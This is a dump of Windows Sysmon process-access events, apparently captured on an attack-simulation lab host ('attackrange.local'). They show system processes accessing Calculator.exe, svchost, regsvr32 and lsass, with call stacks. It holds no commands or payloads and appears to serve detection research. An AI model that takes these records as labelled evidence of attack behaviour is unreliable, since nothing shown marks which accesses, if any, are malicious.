10341000x8000000000000000360415Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360414Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.890{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+2bccd|C:\Windows\System32\ApplicationFrame.dll+6142|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360413Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.874{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360412Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.874{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+6131|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360411Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.858{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9
10341000x8000000000000000360410Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.858{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360409Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.858{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+1314a|C:\Windows\System32\ApplicationFrame.dll+12ce5|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360408Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.858{8e433fbf-337b-6013-8402-000000001100}16567556C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360407Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360406Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+12a42|C:\Windows\System32\ApplicationFrame.dll+611e|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360405Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337b-6013-8402-000000001100}16567556C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360404Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a172|C:\Windows\SYSTEM32\psmserviceexthost.dll+19e3b|C:\Windows\SYSTEM32\psmserviceexthost.dll+bfd2|C:\Windows\SYSTEM32\psmserviceexthost.dll+be39|C:\Windows\SYSTEM32\psmserviceexthost.dll+bdac|C:\Windows\SYSTEM32\psmserviceexthost.dll+2f732|C:\Windows\SYSTEM32\psmserviceexthost.dll+3dd8c|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360403Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+107a4|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360402Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf
10341000x8000000000000000360401Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0a00-000000001100}9044540C:\Windows\system32\services.exe{8e433fbf-36df-6013-a003-000000001100}1312C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5b3d3|C:\Windows\System32\KERNEL32.DLL+1c9af|C:\Windows\system32\services.exe+b626|C:\Windows\system32\services.exe+e42b|C:\Windows\system32\services.exe+c695|C:\Windows\system32\services.exe+c304|C:\Windows\system32\services.exe+f1e0|C:\Windows\system32\services.exe+e0b6|C:\Windows\system32\services.exe+d98b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2
10341000x8000000000000000360400Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-1100-000000001100}11161040C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360399Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-9f03-000000001100}10200C:\Windows\system32\regsvr32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360398Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360397Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360396Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+31ff3|C:\Windows\system32\lsasrv.dll+2fb89|C:\Windows\system32\lsasrv.dll+2e5cf|C:\Windows\system32\lsasrv.dll+2aaa9|C:\Windows\system32\lsasrv.dll+2a418|C:\Windows\system32\lsasrv.dll+149ab|C:\Windows\SYSTEM32\SspiSrv.dll+177c|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360395Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360394Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10daa|c:\windows\system32\lsm.dll+1008d|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360393Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+ff97|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360392Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337e-6013-9402-000000001100}75849716C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+25de9|C:\Windows\System32\ApplicationFrame.dll+6106|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
10341000x8000000000000000360391Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a44-6013-0e00-000000001100}7129148C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+310c0|C:\Windows\SYSTEM32\psmserviceexthost.dll+30dbf|C:\Windows\SYSTEM32\ntdll.dll+6ba5|C:\Windows\SYSTEM32\ntdll.dll+67f1|C:\Windows\SYSTEM32\ntdll.dll+6650|C:\Windows\SYSTEM32\ntdll.dll+305ac|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1
